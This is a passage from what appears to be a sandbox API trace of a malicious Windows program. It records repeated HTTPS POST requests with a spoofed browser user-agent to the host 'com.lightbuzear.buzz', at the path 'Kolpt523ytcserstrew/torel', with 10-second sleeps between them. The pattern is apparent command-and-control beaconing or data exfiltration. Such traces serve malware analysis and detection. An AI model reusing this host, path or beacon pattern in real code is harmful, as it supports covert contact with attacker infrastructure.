[0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4780 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0183.192] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0183.192] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0183.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0183.193] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0183.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0183.193] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f470 [0183.193] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0183.193] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0183.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0183.193] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0183.194] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0183.194] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0184.595] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.595] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0184.595] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0184.596] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4780 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0980 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4780 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0184.596] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.596] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0184.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0b0 [0184.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0184.597] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0184.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0184.597] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0184.598] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0184.598] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0184.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.598] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0184.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0184.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0184.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0184.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0184.598] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0184.598] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0980 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0d8 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0184.599] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0184.599] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0184.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0184.600] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0184.600] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0184.600] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.600] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0184.601] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0184.601] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0184.601] FreeLibrary (hLibModule=0x71570000) returned 1 [0184.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0184.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0184.601] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3a8 | out: hHeap=0x4780000) returned 1 [0184.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f380 | out: hHeap=0x4780000) returned 1 [0184.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f330 | out: hHeap=0x4780000) returned 1 [0184.602] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0184.602] Sleep (dwMilliseconds=0x2710) [0184.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0184.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b18 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b18 | out: hHeap=0x4780000) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b18 [0184.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0184.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0184.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0184.613] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0184.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0184.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0184.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b48 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b90 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f330 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f330 | out: hHeap=0x4780000) returned 1 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f330 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0184.614] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f150 [0184.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0184.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0184.615] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0184.615] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0184.615] FreeLibrary (hLibModule=0x71780000) returned 1 [0184.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f150 | out: hHeap=0x4780000) returned 1 [0184.616] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f380 [0184.616] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0184.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0184.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0184.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0184.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b90 [0184.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0980 [0184.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0980 [0184.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f178 [0184.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f178 | out: hHeap=0x4780000) returned 1 [0184.617] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f150 [0184.617] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f178 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b90 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0184.618] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b90 | out: hHeap=0x4780000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0b90 [0184.618] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3a8 [0184.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3a8 | out: hHeap=0x4780000) returned 1 [0184.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0184.619] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0184.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0184.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0184.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0184.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47cd8f0 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f868 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd8f0 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f868 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3a8 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0184.741] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3a8 | out: hHeap=0x4780000) returned 1 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3a8 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0184.741] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0184.742] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0184.742] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0184.742] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0184.743] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47cd8f0 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fbb0 [0184.743] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd8f0 | out: hHeap=0x4780000) returned 1 [0184.743] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0184.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fbb0 | out: hHeap=0x4780000) returned 1 [0184.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0184.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0184.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0184.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0184.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0184.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0184.744] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47f9ed8 [0184.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0184.744] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0184.745] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0184.755] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0185.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f9ed8 | out: hHeap=0x4780000) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0185.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0185.881] GetModuleHandleA 